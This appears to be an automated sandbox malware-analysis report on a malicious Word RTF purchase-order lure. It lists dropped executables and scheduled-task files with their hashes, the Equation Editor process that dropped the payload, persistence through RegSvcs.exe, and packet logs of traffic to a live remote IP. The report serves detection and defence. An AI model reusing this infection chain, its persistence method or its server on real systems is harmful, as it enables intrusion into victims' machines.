Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	5.135021273392143
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mn4xtn:cbk4oL600QydbQxIYODOLedq3Z4j
MD5:	40B11EF601FB28F9B2E69D36857BF2EC
SHA1:	B6454020AD2CEED193F4792B77001D0BD741B370
SHA-256:	C51E12D18CC664425F6711D8AE2507068884C7057092CFA11884100E1E9D49E1
SHA-512:	E3C5BCC714CBFCA4B8058DDCDDF231DCEFA69C15881CE3F8123E59ED45CFB5DA052B56E1945DCF8DC7F800D62F9A4EECB82BCA69A66A1530787AEFFEB15E2BD5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:/28:h
MD5:	F10044BE58C4CFF9861E7CE15165188F
SHA1:	68BF9A7AAFF4CDA03DE25B689B08750D78FBE258
SHA-256:	ED11DBEC0B2ADD9F470A242EC996DCF25E10A2F8A7A1CE59A08B50EAC4CCC797
SHA-512:	D1502FB74EABC6DB68B9A63903B1CB4BCE34D1032C690EFDB3867EC46372D256D3CD8263C56EF1E424DB39A0E7B5058FAD73F0271BA4EC2BC8206BDA44702BA0
Malicious:	true
Preview:	...w.H

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.795707286467131
Encrypted:	false
SSDEEP:	3:oMty8WbSX/MNn:oMLWus
MD5:	D685103573539B7E9FDBF5F1D7DD96CE
SHA1:	4B2FE6B5C0B37954B314FCAEE1F12237A9B02D07
SHA-256:	D78BC23B0CA3EDDF52D56AB85CDC30A71B3756569CB32AA2F6C28DBC23C76E8E
SHA-512:	17769A5944E8929323A34269ABEEF0861D5C6799B0A27F5545FBFADC80E5AB684A471AD6F6A7FC623002385154EA89DE94013051E09120AB94362E542AB0F1DD
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO-14092021.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Tue Sep 14 19:16:15 2021, length=19250, window=hide
Category:	dropped
Size (bytes):	2038
Entropy (8bit):	4.489360922629315
Encrypted:	false
SSDEEP:	48:89vXk/XTk3bfNHbaWf29vXk/XTk3bfNHbaWB:89vXk/Xg1aWf29vXk/Xg1aWB
MD5:	6F6D747317BCD05CFB044E0178FB69E3
SHA1:	E5A1133AF215FA6B4605134C338A46A1FB4B303C
SHA-256:	1C2960B87529A32700DA55DDA439527093C5716206DFBC11B1B28621019026BC
SHA-512:	4DEF13E318AE213310A8F546C0FCDDF2DA2784B61D98855A30AB3DFA38B0A12CEE26CA8787C8B8A9CB9D27FCBAE79E9ED5DED032671CDCA7378D135680D4516E
Malicious:	false
Preview:	L..................F.... ......?......?...c..^....2K...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S ....&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.2K...S.. .PO-140~1.DOC..L.......S...S...........................P.O.-.1.4.0.9.2.0.2.1...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\179605\Users.user\Desktop\PO-14092021.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.-.1.4.0.9.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......179605..........D_....3N...W...9..g............[D_....3N...W...9.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	71
Entropy (8bit):	4.173450908347739
Encrypted:	false
SSDEEP:	3:M1gdm2d6ltkm2d6lmX1gdm2d6lv:MidtA/ktA1dtA1
MD5:	8E1A774A0EB457F3B7CF0D2BF0957E12
SHA1:	53A238F2EC11AEDE85D0D7A8219FCDC1DB20B6CD
SHA-256:	0F0C87BB362F6DAEA1C4E98ECD5130CD804E6F90E50E402C6597F5F6A975BF06
SHA-512:	B8620587D03F506BE43F37EEC9A3B74E18B74EB0B06E48F3EE21E36DCEED596FB507678F72FC762DE2007BAEE37825E3531E79C47E181124012D1774A3666F75
Malicious:	false
Preview:	[doc]..PO-14092021.LNK=0..PO-14092021.LNK=0..[doc]..PO-14092021.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exe Download File
Process:	C:\Users\user\AppData\Roaming\plugmangd5693.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	530432
Entropy (8bit):	7.499649303212309
Encrypted:	false
SSDEEP:	12288:6B6k4DbF53e0IUFLtFlQqUpYpfiTzpFZ2z8WBTNMk4bUtvV:6BExiGaaNBTylO
MD5:	19665F929613C0E945FF13DD25C9362E
SHA1:	7C68CDD329F0AF85782A4B567F9FA37928F942E8
SHA-256:	D21ECA1AE974EF45B254C64420A069072CE32FCE6C191B526D9E81ECFA4537FF
SHA-512:	A364FEC326897ACC19409F3D8BFF688825B25718533B126D656B4EE9559B73D8DA82BDEC405A4B5321ADFC0A51E2A72BCD961D8CD39BB7AF5F67B362EE0D95E7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.?a..............0.............b-... ...@....@.. ....................................@..................................-..O....@.......................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D-......H........d..........2...HH...............................................0..P........(...........s....}......++...+...{......s....(.......X........-....X........-..0............{.....+..&...}.......0..............0...2....0.....+....,......r...p..(.......(......(....o.........,......r?..p..(......+D...o.....+...(.......(......(.....o........(....-...........o.............d.+........0.."........~3........9.......~4.....o.......+.....+......X............-....X..........-..-

C:\Users\user\AppData\Roaming\plugmangd5693.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	530432
Entropy (8bit):	7.499649303212309
Encrypted:	false
SSDEEP:	12288:6B6k4DbF53e0IUFLtFlQqUpYpfiTzpFZ2z8WBTNMk4bUtvV:6BExiGaaNBTylO
MD5:	19665F929613C0E945FF13DD25C9362E
SHA1:	7C68CDD329F0AF85782A4B567F9FA37928F942E8
SHA-256:	D21ECA1AE974EF45B254C64420A069072CE32FCE6C191B526D9E81ECFA4537FF
SHA-512:	A364FEC326897ACC19409F3D8BFF688825B25718533B126D656B4EE9559B73D8DA82BDEC405A4B5321ADFC0A51E2A72BCD961D8CD39BB7AF5F67B362EE0D95E7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.?a..............0.............b-... ...@....@.. ....................................@..................................-..O....@.......................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D-......H........d..........2...HH...............................................0..P........(...........s....}......++...+...{......s....(.......X........-....X........-..0............{.....+..&...}.......0..............0...2....0.....+....,......r...p..(.......(......(....o.........,......r?..p..(......+D...o.....+...(.......(......(.....o........(....-...........o.............d.+........0.."........~3........9.......~4.....o.......+.....+......X............-....X..........-..-

C:\Users\user\Desktop\~$-14092021.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.546485661705798
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	PO-14092021.doc
File size:	19250
MD5:	93abec14185d380695f65beaaca97b84
SHA1:	c18eaeac2c4371dd8e79de62ce60a7b7767f995a
SHA256:	e73b710e825a32ebe4122240ecac87eff1bc76fe130fc41fc5858dafaf96d3b7
SHA512:	9be5938833bdbb9c501b71c60172a4ed10b79710a0cb84ca080d870b5fcf79c122bb5cd70e5883cd98c92079b0dafc28f0b7820c1dd2be39e48d46925dedb28a
SSDEEP:	192:XYkRruV0nOB2qrgbV0W7kI5HH/n4x+iiwgkEPAA2TKe6NDs/JEE5bBWB8V5QKSj:XYMKVo4TqkafQjCkTKe6NDWe0CrKSj
File Content Preview:	{\rtf954657%]9?@>^5?/@?)[[`.!:,/5?8.4;#(.\|/0??.0.221%?=[65!^-^+1@4).%[48_3+:6?`\|]2!3??.?)-'7#@@>9?`??:.<(./1/%_?..@_0?\|%$`%.2.]+\|^+%%%0;9$?~3<4:.`~^?>;?8~?1/!;.?0)()#,\|?15?8]$0'+#~.%:5_.\|\|.~*>.`//?$&#:&00'5`&)]+6.??`9.>?@61,.16^_-%]_,&$@`^%9;5..,6@(?.

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00001D06h								no
1	00001CC1h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/14/21-13:17:58.118312	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50072	8.8.8.8	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 13:16:21.671324015 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.700056076 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.700134039 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.700583935 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.728485107 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730138063 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730185032 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730206966 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.730218887 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730226994 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.730251074 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730326891 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730355978 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.730360031 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730391979 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730391979 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.730412960 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.730420113 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730490923 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730534077 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.730537891 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.730575085 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.730581045 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.730583906 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.738737106 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759104013 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759160042 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759195089 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759226084 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759253979 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759280920 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759303093 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759309053 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759335041 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759336948 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759356022 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759362936 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759366035 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759367943 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759371042 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759445906 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759473085 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759499073 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759499073 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759532928 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759542942 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759573936 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759573936 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759597063 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759629011 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759634972 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759634972 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759639025 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759691000 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759742022 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759747028 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759855032 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759882927 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759903908 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759929895 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.759931087 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759937048 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.759949923 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.760013103 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.760500908 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788477898 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788525105 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788557053 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788583040 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788589001 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788603067 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788606882 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788619041 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788650036 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788661003 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788667917 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788680077 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788701057 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788711071 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788743019 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788753986 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788758993 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788775921 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788806915 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788825989 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788832903 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788836956 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788867950 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788882971 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788887978 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788901091 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788916111 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788932085 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788963079 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.788981915 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788985968 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.788994074 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789002895 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789024115 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789063931 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789067984 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789094925 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789124012 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789158106 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789167881 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789174080 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789189100 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789221048 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789237022 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789242029 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789251089 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789283037 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789314032 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789369106 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789397001 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789424896 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789452076 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789427996 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789480925 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789505959 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789510965 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789511919 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789514065 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789535999 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789537907 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789544106 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789547920 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789551973 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789555073 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789558887 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789563894 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789659023 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789685011 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789714098 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789717913 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789740086 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789741993 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789743900 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789767981 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789783001 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789813995 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.789859056 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.789863110 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.791038036 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.816943884 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817003012 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817068100 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817084074 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817090988 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817153931 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817200899 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817207098 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817315102 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817358017 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817390919 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817397118 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817430019 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817457914 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817485094 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817512035 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817564964 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817569017 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817569971 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817610025 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817646980 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817651987 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817662954 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817699909 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817739010 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817773104 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817779064 CEST	49165	80	192.168.2.22	185.239.243.112
